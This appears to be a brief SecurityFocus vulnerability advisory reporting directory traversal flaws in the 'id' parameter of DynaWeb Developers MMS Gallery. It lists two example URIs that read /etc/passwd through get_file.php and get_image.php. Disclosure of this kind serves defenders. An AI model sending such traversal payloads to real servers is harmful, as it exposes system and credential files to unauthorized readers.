DynaWeb Developers MMS Gallery 'id' Parameter Multiple Directory Traversal Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/mms_template/get_file.php?id=../../../../../../../../etc/passwd
http://www.example.com/mms_template/get_image.php?id=../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus